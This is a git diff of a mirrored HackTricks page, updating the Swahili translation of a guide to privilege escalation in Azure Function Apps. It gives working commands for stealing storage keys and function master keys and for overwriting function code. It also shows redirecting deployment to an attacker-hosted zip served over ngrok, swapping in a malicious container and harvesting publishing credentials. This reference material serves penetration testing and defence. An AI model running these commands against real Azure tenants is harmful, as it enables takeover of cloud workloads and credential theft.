mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-05 20:40:18 -08:00
Translated ['', 'src/pentesting-cloud/azure-security/az-privilege-escala
This commit is contained in:
Translator
@@ -4,7 +4,7 @@
|
||||
|
||||
## Function Apps
|
||||
|
||||
Angalia ukurasa ufuatao kwa maelezo zaidi:
|
||||
Angalia ukurasa ufuatao kwa taarifa zaidi:
|
||||
|
||||
{{#ref}}
|
||||
../az-services/az-function-apps.md
|
||||
@@ -12,26 +12,24 @@ Angalia ukurasa ufuatao kwa maelezo zaidi:
|
||||
|
||||
### Bucket Read/Write
|
||||
|
||||
Kwa ruhusa za kusoma kontena ndani ya Akaunti ya Hifadhi inayohifadhi data za kazi, inawezekana kupata **kontena tofauti** (za kawaida au zenye majina yaliyowekwa awali) ambayo yanaweza kuwa na **msimbo unaotekelezwa na kazi**.
|
||||
Kwa ruhusa za kusoma containers ndani ya Storage Account inayohifadhi data za function, inawezekana kupata **different containers** (custom au zenye majina yaliyopangwa) ambazo zinaweza kuwa na **the code executed by the function**.
|
||||
|
||||
Mara tu unapopata mahali ambapo msimbo wa kazi umehifadhiwa, ikiwa una ruhusa za kuandika juu yake, unaweza kufanya kazi itekeleze msimbo wowote na kupandisha haki kwa utambulisho unaosimamiwa ulioambatanishwa na kazi hiyo.
|
||||
Mara unapopata wapi the code of the function iko, ikiwa una ruhusa za kuandika juu yake unaweza kufanya the function itekeleze any code na escalate privileges kwa managed identities attached to the function.
|
||||
|
||||
- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` na `WEBSITE_CONTENTSHARE`)
|
||||
- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE)`
|
||||
|
||||
Msimbo wa kazi kwa kawaida huhifadhiwa ndani ya file share. Kwa ufikiaji wa kutosha, inawezekana kubadilisha faili ya msimbo na **kufanya kazi ipakue msimbo wowote** ikiruhusu kupandisha haki kwa utambulisho unaosimamiwa ulioambatanishwa na Kazi.
|
||||
|
||||
Njia hii ya kutekeleza kawaida huweka mipangilio **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** na **`WEBSITE_CONTENTSHARE`** ambazo unaweza kupata kutoka
|
||||
The code of the function is usually stored inside a file share. With enough access it's possible to modify the code file and **make the function load arbitrary code** allowing to escalate privileges to the managed identities attached to the Function.
|
||||
```bash
|
||||
az functionapp config appsettings list \
|
||||
--name <app-name> \
|
||||
--resource-group <res-group>
|
||||
```
|
||||
Mikakati hiyo itakuwa na **Storage Account Key** ambayo Function inaweza kutumia kufikia msimbo.
|
||||
Mafaili ya konfigurasheni yatakuwa na **Storage Account Key** ambayo Function inaweza kutumia kufikia msimbo.
|
||||
|
||||
> [!CAUTION]
|
||||
> Kwa ruhusa ya kutosha kuungana na File Share na **kubadilisha skripti** inayotumika, inawezekana kutekeleza msimbo wowote katika Function na kupandisha ruhusa.
|
||||
> Kwa ruhusa za kutosha kuungana na File Share na **modify the script** inayotekelezwa, inawezekana kutekeleza msimbo wowote ndani ya Function na kuongeza ruhusa.
|
||||
|
||||
Mfano ufuatao unatumia macOS kuungana na file share, lakini inapendekezwa pia kuangalia ukurasa ufuatao kwa maelezo zaidi kuhusu file shares:
|
||||
Mfano ufuatao unatumia macOS kuungana na file share, lakini inapendekezwa pia kukagua ukurasa ufuatao kwa habari zaidi kuhusu file shares:
|
||||
|
||||
{{#ref}}
|
||||
../az-services/az-file-shares.md
|
||||
@@ -47,26 +45,26 @@ open "smb://<STORAGE-ACCOUNT>.file.core.windows.net/<FILE-SHARE-NAME>"
|
||||
```
|
||||
- **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`)
|
||||
|
||||
Ni kawaida pia kupata **zip releases** ndani ya folda `function-releases` ya kontena la Akaunti ya Hifadhi ambayo programu ya kazi inatumia katika kontena **ambayo kwa kawaida inaitwa `function-releases`**.
|
||||
Ni kawaida pia kupata **zip releases** ndani ya folda `function-releases` ya container ya Storage Account ambayo function app inaitumia, ndani ya container **kwa kawaida inayoitwa `function-releases`**.
|
||||
|
||||
Kwa kawaida, njia hii ya kutekeleza itapanga config ya `WEBSITE_RUN_FROM_PACKAGE` katika:
|
||||
Kawaida, njia hii ya deployment itaweka config `WEBSITE_RUN_FROM_PACKAGE` katika:
|
||||
```bash
|
||||
az functionapp config appsettings list \
|
||||
--name <app-name> \
|
||||
--resource-group <res-group>
|
||||
```
|
||||
Hii config kawaida itakuwa na **SAS URL ya kupakua** msimbo kutoka kwa Akaunti ya Hifadhi.
|
||||
This config will usually contain a **SAS URL to download** the code from the Storage Account.
|
||||
|
||||
> [!CAUTION]
|
||||
> Kwa ruhusa ya kutosha kuungana na kontena la blob ambalo **linashikilia msimbo katika zip** inawezekana kutekeleza msimbo wowote katika Kazi na kupandisha ruhusa.
|
||||
> Ikiwa kuna ruhusa za kutosha za kuunganishwa kwenye blob container ambayo **contains the code in zip**, inawezekana kutekeleza arbitrary code kwenye Function na escalate privileges.
|
||||
|
||||
- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)`
|
||||
- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE`)
|
||||
|
||||
Kama ilivyo katika kesi ya awali, ikiwa usambazaji unafanywa kupitia Github Actions inawezekana kupata folda **`github-actions-deploy`** katika Akaunti ya Hifadhi inayoshikilia zip ya msimbo na SAS URL kwa zip katika mipangilio `WEBSITE_RUN_FROM_PACKAGE`.
|
||||
Kama katika kesi iliyopita, ikiwa deployment imetokea kupitia Github Actions inawezekana kupata folda **`github-actions-deploy`** kwenye Storage Account inayojumuisha zip ya code na SAS URL kwa zip hiyo katika setting `WEBSITE_RUN_FROM_PACKAGE`.
|
||||
|
||||
- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` na `WEBSITE_CONTENTSHARE`)
|
||||
- **`scm-releases`**(`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE`)
|
||||
|
||||
Kwa ruhusa za kusoma kontena ndani ya Akaunti ya Hifadhi inayohifadhi data za kazi inawezekana kupata kontena **`scm-releases`**. Ndani yake inawezekana kupata toleo la hivi karibuni katika **Squashfs filesystem file format** na hivyo inawezekana kusoma msimbo wa kazi:
|
||||
Kwa ruhusa za kusoma containers ndani ya Storage Account inayohifadhi function data inawezekana kupata container **`scm-releases`**. Ndani yake inawezekana kupata release ya mwisho katika **Squashfs filesystem file format** na kwa hivyo inawezekana kusoma code ya function:
|
||||
```bash
|
||||
# List containers inside the storage account of the function app
|
||||
az storage container list \
|
||||
@@ -98,10 +96,10 @@ unsquashfs -l "/tmp/scm-latest-<app-name>.zip"
|
||||
mkdir /tmp/fs
|
||||
unsquashfs -d /tmp/fs /tmp/scm-latest-<app-name>.zip
|
||||
```
|
||||
Ni pia inawezekana kupata **funguo za master na functions** zilizohifadhiwa katika akaunti ya hifadhi katika kontena **`azure-webjobs-secrets`** ndani ya folda **`<app-name>`** katika faili za JSON unazoweza kupata ndani.
|
||||
Pia inawezekana kupata **master and functions keys** zilizohifadhiwa kwenye storage account, kwenye container **`azure-webjobs-secrets`** ndani ya folda **`<app-name>`**, katika faili za JSON zilizomo ndani.
|
||||
|
||||
> [!CAUTION]
|
||||
> Kwa ruhusa ya kutosha kuungana na kontena la blob ambalo **linabeba msimbo katika faili la nyongeza ya zip** (ambalo kwa kweli ni **`squashfs`**) inawezekana kutekeleza msimbo wowote katika Function na kupandisha ruhusa.
|
||||
> Kwa ruhusa za kutosha za kuunganishwa na blob container ambayo **ina code katika zip extension file** (ambayo kwa kweli ni **`squashfs`**), inawezekana kutekeleza code yoyote katika Function na kupandisha ruhusa.
|
||||
```bash
|
||||
# Modify code inside the script in /tmp/fs adding your code
|
||||
|
||||
@@ -118,11 +116,11 @@ az storage blob upload \
|
||||
```
|
||||
### `Microsoft.Web/sites/host/listkeys/action`
|
||||
|
||||
Ruhusa hii inaruhusu kuorodhesha funguo za kazi, mkuu na mfumo, lakini si funguo za mwenyeji, za kazi iliyotajwa na:
|
||||
Ruhusa hii inaruhusu kuorodhesha function, master na system keys, lakini sio host key ya function iliyobainishwa kwa:
|
||||
```bash
|
||||
az functionapp keys list --resource-group <res_group> --name <func-name>
|
||||
```
|
||||
Kwa funguo kuu pia inawezekana kupata msimbo wa chanzo katika URL kama:
|
||||
Kwa master key pia inawezekana kupata source code kupitia URL kama:
|
||||
```bash
|
||||
# Get "script_href" from
|
||||
az rest --method GET \
|
||||
@@ -130,49 +128,70 @@ az rest --method GET \
|
||||
|
||||
# Access
|
||||
curl "<script-href>?code=<master-key>"
|
||||
## Python example:
|
||||
# Python function app example
|
||||
curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v
|
||||
# JavaScript function app example
|
||||
curl "https://consumptionexample.azurewebsites.net/admin/vfs/site/wwwroot/HttpExample/index.js?code=tKln7u4DtLgmG55XEvMjN0Lv9a3rKZK4dLbOHmWgD2v1AzFu3w9y_A==" -v
|
||||
```
|
||||
Na kubadilisha **kanuni inayotekelezwa** katika kazi na:
|
||||
Na kubadilisha **code inayotekelezwa** katika function kwa:
|
||||
```bash
|
||||
# Set the code to set in the function in /tmp/function_app.py
|
||||
## The following continues using the python example
|
||||
## Python function app example
|
||||
curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" \
|
||||
--data-binary @/tmp/function_app.py \
|
||||
-H "Content-Type: application/json" \
|
||||
-H "If-Match: *" \
|
||||
-v
|
||||
|
||||
# NodeJS function app example
|
||||
curl -X PUT "https://consumptionexample.azurewebsites.net/admin/vfs/site/wwwroot/HttpExample/index.js?code=tKln7u4DtLgmG55XEvMjN0Lv9a3rKZK4dLbOHmWgD2v1AzFu3w9y_A==" \
|
||||
--data-binary @/tmp/index.js \
|
||||
-H "Content-Type: application/json" \
|
||||
-H "If-Match: *" \
|
||||
-v
|
||||
```
|
||||
### `Microsoft.Web/sites/functions/listKeys/action`
|
||||
|
||||
Ruhusa hii inaruhusu kupata funguo za mwenyeji, za kazi iliyotajwa na:
|
||||
Ruhusa hii inaruhusu kupata ufunguo chaguo-msingi wa function iliyotajwa kwa:
|
||||
```bash
|
||||
az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"
|
||||
```
|
||||
Iite function ukitumia default key uliopata:
|
||||
```bash
|
||||
curl "https://<app-name>.azurewebsites.net/api/<func-endpoint-name>?code=<default-key>"
|
||||
```
|
||||
### `Microsoft.Web/sites/host/functionKeys/write`
|
||||
|
||||
Ruhusa hii inaruhusu kuunda/update funguo za kazi za kazi iliyoainishwa na:
|
||||
Ruhusa hii inaruhusu kuunda/kusasisha function key ya function iliyotajwa kwa:
|
||||
```bash
|
||||
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
|
||||
```
|
||||
### `Microsoft.Web/sites/host/masterKey/write`
|
||||
|
||||
Ruhusa hii inaruhusu kuunda/update funguo kuu kwa kazi iliyoainishwa na:
|
||||
Ruhusa hii inaruhusu kuunda/kusasisha master key kwa function iliyotajwa kwa:
|
||||
```bash
|
||||
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
|
||||
```
|
||||
> [!CAUTION]
|
||||
> Kumbuka kwamba kwa funguo hii unaweza pia kufikia msimbo wa chanzo na kuubadilisha kama ilivyoelezwa hapo awali!
|
||||
> Kumbuka kwamba kwa key hii pia unaweza kupata source code na kuibadilisha kama ilivyoelezwa hapo awali!
|
||||
|
||||
### `Microsoft.Web/sites/host/systemKeys/write`
|
||||
|
||||
Ruhusa hii inaruhusu kuunda/update funguo za mfumo kwa kazi iliyoainishwa na:
|
||||
Ruhusa hii inaruhusu kuunda/kusasisha system function key kwa function maalum kwa:
|
||||
```bash
|
||||
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
|
||||
```
|
||||
Tumia ufunguo:
|
||||
```bash
|
||||
# Ejemplo: Acceso a endpoints de Durable Functions
|
||||
curl "https://<app-name>.azurewebsites.net/runtime/webhooks/durabletask/instances?code=<system-key>"
|
||||
|
||||
# Ejemplo: Acceso a Event Grid webhooks
|
||||
curl "https://<app-name>.azurewebsites.net/runtime/webhooks/eventgrid?code=<system-key>"
|
||||
```
|
||||
### `Microsoft.Web/sites/config/list/action`
|
||||
|
||||
Ruhusa hii inaruhusu kupata mipangilio ya kazi. Ndani ya hizi mipangilio inaweza kuwa na uwezo wa kupata thamani za msingi **`AzureWebJobsStorage`** au **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** ambazo zina **funguo za akaunti za kufikia uhifadhi wa blob wa kazi kwa ruhusa KAMILI**.
|
||||
Ruhusa hii inaruhusu kupata mipangilio ya function. Ndani ya mipangilio hii inaweza kuwa inawezekana kupata thamani za chaguo-msingi **`AzureWebJobsStorage`** au **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`**, ambazo zina **funguo la akaunti ili kufikia blob storage ya function kwa ruhusa KAMILI**.
|
||||
```bash
|
||||
az functionapp config appsettings list --name <func-name> --resource-group <res-group>
|
||||
```
|
||||
@@ -183,9 +202,9 @@ az rest --method POST \
|
||||
```
|
||||
### `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/write`
|
||||
|
||||
Hizi ruhusa zinaruhusu kuorodhesha thamani za config za kazi kama tulivyoona hapo awali pamoja na **kubadilisha hizi thamani**. Hii ni muhimu kwa sababu mipangilio hii inaonyesha mahali ambapo msimbo wa kutekeleza ndani ya kazi unapatikana.
|
||||
Ruhusa hizi zinawezesha kuorodhesha thamani za config za function kama tulivyoshuhudia hapo awali pamoja na **kubadilisha thamani hizi**. Hii ni muhimu kwa sababu mipangilio hii inaonyesha mahali ambapo code itakayotekelezwa ndani ya function imehifadhiwa.
|
||||
|
||||
Kwa hivyo inawezekana kuweka thamani ya mipangilio **`WEBSITE_RUN_FROM_PACKAGE`** ikielekeza kwenye URL zip faili inayoshikilia msimbo mpya wa kutekeleza ndani ya programu ya wavuti:
|
||||
Kwa hivyo inawezekana kuweka thamani ya setting **`WEBSITE_RUN_FROM_PACKAGE`** ikielekeza kwenye URL ya zip inayobeba code mpya ya kutekelezwa ndani ya web application:
|
||||
|
||||
- Anza kwa kupata config ya sasa
|
||||
```bash
|
||||
@@ -193,7 +212,7 @@ az functionapp config appsettings list \
|
||||
--name <app-name> \
|
||||
--resource-group <res-name>
|
||||
```
|
||||
- Unda msimbo unayotaka kazi ifanye na uweke hadharani
|
||||
- Tengeneza code unayotaka function ifanye kazi, kisha ui-host hadharani
|
||||
```bash
|
||||
# Write inside /tmp/web/function_app.py the code of the function
|
||||
cd /tmp/web/function_app.py
|
||||
@@ -203,9 +222,9 @@ python3 -m http.server
|
||||
# Serve it using ngrok for example
|
||||
ngrok http 8000
|
||||
```
|
||||
- Badilisha kazi, shika vigezo vya awali na ongeza mwishoni config **`WEBSITE_RUN_FROM_PACKAGE`** ikielekeza kwenye URL yenye **zip** inayoshikilia msimbo.
|
||||
- Badilisha function, hifadhi vigezo vya awali na ongeza mwishoni config **`WEBSITE_RUN_FROM_PACKAGE`** ikielekeza kwenye URL yenye **zip** inayojumuisha code.
|
||||
|
||||
Mfano ufuatao ni wa **mipangilio yangu mwenyewe unahitaji kubadilisha thamani kwa zako**, kumbuka mwishoni thamani `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"`, hapa ndipo nilipokuwa nikihifadhi programu.
|
||||
Ifuatayo ni mfano wa mipangilio yangu mwenyewe **ambazo utahitaji kubadilisha thamani ili ziendane na zako**, kumbuka mwishoni thamani `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"`, hapa ndiyo nilikuwa niki-host programu.
|
||||
```bash
|
||||
# Modify the function
|
||||
az rest --method PUT \
|
||||
@@ -215,7 +234,7 @@ az rest --method PUT \
|
||||
```
|
||||
### `Microsoft.Web/sites/hostruntime/vfs/write`
|
||||
|
||||
Kwa ruhusa hii ni **uwezekano wa kubadilisha msimbo wa programu** kupitia konsoli ya wavuti (au kupitia kiunganishi hiki cha API):
|
||||
Kwa ruhusa hii inawezekana **kubadilisha msimbo wa programu** kupitia web console (au kupitia API endpoint ifuatayo):
|
||||
```bash
|
||||
# This is a python example, so we will be overwritting function_app.py
|
||||
# Store in /tmp/body the raw python code to put in the function
|
||||
@@ -223,10 +242,29 @@ az rest --method PUT \
|
||||
--uri "https://management.azure.com/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \
|
||||
--headers '{"Content-Type": "application/json", "If-Match": "*"}' \
|
||||
--body @/tmp/body
|
||||
|
||||
# Through the SCM URL (using Azure permissions or SCM creds)
|
||||
az rest --method PUT \
|
||||
--url "https://consumptionexample.scm.azurewebsites.net/api/vfs/site/wwwroot/HttpExample/index.js" \
|
||||
--resource "https://management.azure.com/" \
|
||||
--headers "If-Match=*" \
|
||||
--body 'module.exports = async function (context, req) {
|
||||
context.log("JavaScript HTTP trigger function processed a request. Training Demo 2");
|
||||
|
||||
const name = (req.query.name || (req.body && req.body.name));
|
||||
const responseMessage = name
|
||||
? "Hello, " + name + ". This HTTP triggered function executed successfully. Training Demo 2"
|
||||
: "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response. Training Demo 2";
|
||||
|
||||
context.res = {
|
||||
// status: 200, /* Defaults to 200 */
|
||||
body: responseMessage
|
||||
};
|
||||
}'
|
||||
```
|
||||
### `Microsoft.Web/sites/publishxml/action`, (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`)
|
||||
|
||||
Ruhusa hizi zinaruhusu kuorodhesha wasifu wote wa uchapishaji ambao kimsingi unajumuisha **basic auth credentials**:
|
||||
Ruhusa hii inaruhusu kuorodhesha profaili zote za kuchapisha ambazo kimsingi zinajumuisha **basic auth credentials**:
|
||||
```bash
|
||||
# Get creds
|
||||
az functionapp deployment list-publishing-profiles \
|
||||
@@ -234,15 +272,15 @@ az functionapp deployment list-publishing-profiles \
|
||||
--resource-group <res-name> \
|
||||
--output json
|
||||
```
|
||||
Njia nyingine ingekuwa kuweka akreditivu zako mwenyewe na kuzitumia kwa kutumia:
|
||||
Chaguo jingine ni kuweka creds zako mwenyewe na kuzitumia:
|
||||
```bash
|
||||
az functionapp deployment user set \
|
||||
--user-name DeployUser123456 g \
|
||||
--password 'P@ssw0rd123!'
|
||||
```
|
||||
- Ikiwa **REDACTED** akauti
|
||||
- Ikiwa **REDACTED** credentials
|
||||
|
||||
Ikiwa unaona kwamba akauti hizo ni **REDACTED**, ni kwa sababu unahitaji **kuwezesha chaguo la uthibitishaji wa msingi wa SCM** na kwa hiyo unahitaji ruhusa ya pili (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
|
||||
Ikiwa unaona kwamba credentials hizo ni **REDACTED**, ni kwa sababu unahitaji **kuwezesha chaguo la SCM la uthibitishaji wa msingi** na kwa hilo unahitaji ruhusa ya pili (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
|
||||
```bash
|
||||
# Enable basic authentication for SCM
|
||||
az rest --method PUT \
|
||||
@@ -262,9 +300,9 @@ az rest --method PUT \
|
||||
}
|
||||
}
|
||||
```
|
||||
- **Method SCM**
|
||||
- **Mbinu SCM**
|
||||
|
||||
Kisha, unaweza kufikia na hizi **basic auth credentials to the SCM URL** ya programu yako ya kazi na kupata thamani za mabadiliko ya env:
|
||||
Kisha, unaweza kufikia kwa kutumia hizi **basic auth credentials to the SCM URL** za function app yako na kupata thamani za env variables:
|
||||
```bash
|
||||
# Get settings values
|
||||
curl -u '<username>:<password>' \
|
||||
@@ -275,15 +313,15 @@ zip function_app.zip function_app.py # Your code in function_app.py
|
||||
curl -u '<username>:<password>' -X POST --data-binary "@<zip_file_path>" \
|
||||
https://<app-name>.scm.azurewebsites.net/api/zipdeploy
|
||||
```
|
||||
_Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$<app-name>`._
|
||||
_Nakumbuka kwamba **SCM username** kawaida ni karakteri "$" ikifuatiwa na jina la app, kwa hivyo: `$<app-name>`._
|
||||
|
||||
Unaweza pia kufikia ukurasa wa wavuti kutoka `https://<app-name>.scm.azurewebsites.net/BasicAuth`
|
||||
|
||||
Thamani za mipangilio zinajumuisha **AccountKey** ya akaunti ya hifadhi inayohifadhi data ya programu ya kazi, ikiruhusu kudhibiti akaunti hiyo ya hifadhi.
|
||||
Thamani za settings zinajumuisha **AccountKey** ya storage account inayohifadhi data za function app, ikiruhusu kudhibiti storage account hiyo.
|
||||
|
||||
- **Method FTP**
|
||||
- **Mbinu FTP**
|
||||
|
||||
Unganisha na seva ya FTP ukitumia:
|
||||
Ungana na seva ya FTP ukitumia:
|
||||
```bash
|
||||
# macOS install lftp
|
||||
brew install lftp
|
||||
@@ -297,19 +335,19 @@ ls # List
|
||||
get ./function_app.py -o /tmp/ # Download function_app.py in /tmp
|
||||
put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and deploy it
|
||||
```
|
||||
_Kumbuka kwamba **jina la mtumiaji wa FTP** kawaida liko katika muundo \<app-name>\\$\<app-name>._
|
||||
_Kumbuka kwamba **FTP username** kawaida huwa katika muundo \<app-name>\\$\<app-name>._
|
||||
|
||||
### `Microsoft.Web/sites/hostruntime/vfs/read`
|
||||
|
||||
Ruhusa hii inaruhusu **kusoma msimbo wa chanzo** wa programu kupitia VFS:
|
||||
Ruhusa hii inaruhusu **kusoma msimbo wa chanzo** wa app kupitia VFS:
|
||||
```bash
|
||||
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
|
||||
```
|
||||
### `Microsoft.Web/sites/functions/token/action`
|
||||
|
||||
Kwa ruhusa hii inawezekana [kupata **token ya admin**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) ambayo inaweza kutumika baadaye kupata **funguo kuu** na hivyo kufikia na kubadilisha msimbo wa kazi.
|
||||
Kwa ruhusa hii inawezekana [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) ambayo baadaye inaweza kutumika kupata **master key** na kwa hivyo kufikia na kubadilisha function's code.
|
||||
|
||||
Hata hivyo, katika ukaguzi wangu wa mwisho hakukuwa na token iliyorejeshwa, hivyo inaweza kuwa imezimwa au haitumiki tena, lakini hapa kuna jinsi unavyoweza kufanya hivyo:
|
||||
Hata hivyo, katika ukaguzi wangu wa mwisho hakuna token iliyorudishwa, hivyo inaweza kuwa imezimwa au haifanyi kazi tena, lakini hapa ni jinsi ungevifanya:
|
||||
```bash
|
||||
# Get admin token
|
||||
az rest --method GET \
|
||||
@@ -321,7 +359,7 @@ curl "https://<app-name>.azurewebsites.net/admin/host/systemkeys/_master" \
|
||||
```
|
||||
### `Microsoft.Web/sites/config/write`, (`Microsoft.Web/sites/functions/properties/read`)
|
||||
|
||||
Ruhusa hizi zinaruhusu **kuwezesha kazi** ambazo zinaweza kuwa zimezimwa (au kuzizima).
|
||||
Ruhusa hizi zinaruhusu **kuwezesha functions** ambazo zinaweza kuwa zimezimwa (au kuzizima).
|
||||
```bash
|
||||
# Enable a disabled function
|
||||
az functionapp config appsettings set \
|
||||
@@ -329,13 +367,13 @@ az functionapp config appsettings set \
|
||||
--resource-group <res-group> \
|
||||
--settings "AzureWebJobs.http_trigger1.Disabled=false"
|
||||
```
|
||||
Inawezekana pia kuona kama kazi imewezeshwa au kuzuiliwa katika URL ifuatayo (ukitumia ruhusa iliyo katika mabano):
|
||||
Inawezekana pia kuona ikiwa function imewezeshwa au imezimwa kwenye URL ifuatayo (ukitumia ruhusa ndani ya mabano):
|
||||
```bash
|
||||
az rest --url "https://management.azure.com/subscriptions/<subscripntion-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/<func-name>/properties/state?api-version=2024-04-01"
|
||||
```
|
||||
### `Microsoft.Web/sites/config/write`, `Microsoft.Web/sites/config/list/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/read`)
|
||||
|
||||
Kwa ruhusa hizi inawezekana **kubadilisha kontena linalotumiwa na programu ya kazi** iliyowekwa kufanya kazi na kontena. Hii itamruhusu mshambuliaji kupakia programu ya kontena ya kazi ya azure yenye uharibifu kwenye docker hub (kwa mfano) na kufanya kazi hiyo iite.
|
||||
Kwa ruhusa hizi inawezekana **kubadilisha container inayotumika na function app** iliyosanifiwa kuendesha container. Hii itamruhusu attacker kupakia azure function container app yenye madhara kwenye docker hub (kwa mfano) na kufanya function iiitekeleze.
|
||||
```bash
|
||||
az functionapp config container set --name <app-name> \
|
||||
--resource-group <res-group> \
|
||||
@@ -343,29 +381,29 @@ az functionapp config container set --name <app-name> \
|
||||
```
|
||||
### `Microsoft.Web/sites/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/operationresults/read`)
|
||||
|
||||
Kwa ruhusa hizi inawezekana **kuunganisha utambulisho wa mtumiaji ulioendeshwa na kazi**. Ikiwa kazi hiyo ilikumbwa na hatari hii itaruhusu kupandisha mamlaka kwa utambulisho wowote wa mtumiaji ulioendeshwa.
|
||||
Kwa ruhusa hizi inawezekana **kuambatisha user managed identity mpya kwa function**. Ikiwa function imevamiwa, hii itaruhusu kupandisha ruhusa kwa user managed identity yoyote.
|
||||
```bash
|
||||
az functionapp identity assign \
|
||||
--name <app-name> \
|
||||
--resource-group <res-group> \
|
||||
--identities /subscriptions/<subs-id>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>
|
||||
```
|
||||
### Remote Debugging
|
||||
### Urekebishaji wa Mbali
|
||||
|
||||
Ni uwezekano wa kuungana ili kudhibiti kazi inayotembea ya Azure kama [**ilivyoelezwa katika nyaraka**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). Hata hivyo, kwa kawaida Azure itazima chaguo hili baada ya siku 2 ikiwa mendelevu atasahau ili kuepuka kuacha usanidi dhaifu.
|
||||
Inawezekana pia kuunganishwa ili kudebug Function inayotumika kama [**explained in the docs**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). Hata hivyo, kwa chaguo-msingi Azure itazima chaguo hili ndani ya siku 2 ikiwa msanidi programu atakosa, ili kuepuka kuacha usanidi wenye udhaifu.
|
||||
|
||||
Ni uwezekano wa kuangalia ikiwa Kazi ina udhibiti ulioanzishwa na:
|
||||
Inawezekana kuangalia ikiwa Function imewezeshwa debugging kwa:
|
||||
```bash
|
||||
az functionapp show --name <app-name> --resource-group <res-group>
|
||||
```
|
||||
Kuwa na ruhusa `Microsoft.Web/sites/config/write` pia inawezekana kuweka kazi katika hali ya ufuatiliaji (amri ifuatayo pia inahitaji ruhusa `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` na `Microsoft.Web/sites/Read`).
|
||||
Kuwa na ruhusa `Microsoft.Web/sites/config/write` pia inawezekana kuweka function katika debugging mode (amri ifuatayo pia inahitaji ruhusa `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` na `Microsoft.Web/sites/Read`).
|
||||
```bash
|
||||
az functionapp config set --remote-debugging-enabled=True --name <app-name> --resource-group <res-group>
|
||||
```
|
||||
### Badilisha Github repo
|
||||
|
||||
Nilijaribu kubadilisha Github repo ambapo kutekelezwa kunafanyika kwa kutekeleza amri zifuatazo lakini hata kama ilibadilika, **msimbo mpya haukupakuliwa** (labda kwa sababu inatarajia Github Action kuboresha msimbo).\
|
||||
Zaidi ya hayo, **kitambulisho cha usimamizi wa shirikisho hakikubadilishwa** kuruhusu hazina mpya, hivyo inaonekana kwamba hii si ya manufaa sana.
|
||||
Nilijaribu kubadilisha Github repo kutoka ambapo deploying inafanyika kwa kutekeleza amri zifuatazo lakini hata kama ilibadilika, **the new code was not loaded** (labda kwa sababu inatarajia Github Action kusasisha code).\
|
||||
Zaidi ya hayo, **managed identity federated credential wasn't updated** kuruhusu repo mpya, hivyo inaonekana hii sio ya msaada.
|
||||
```bash
|
||||
# Remove current
|
||||
az functionapp deployment source delete \
|
||||
|
||||
Reference in New Issue
Block a user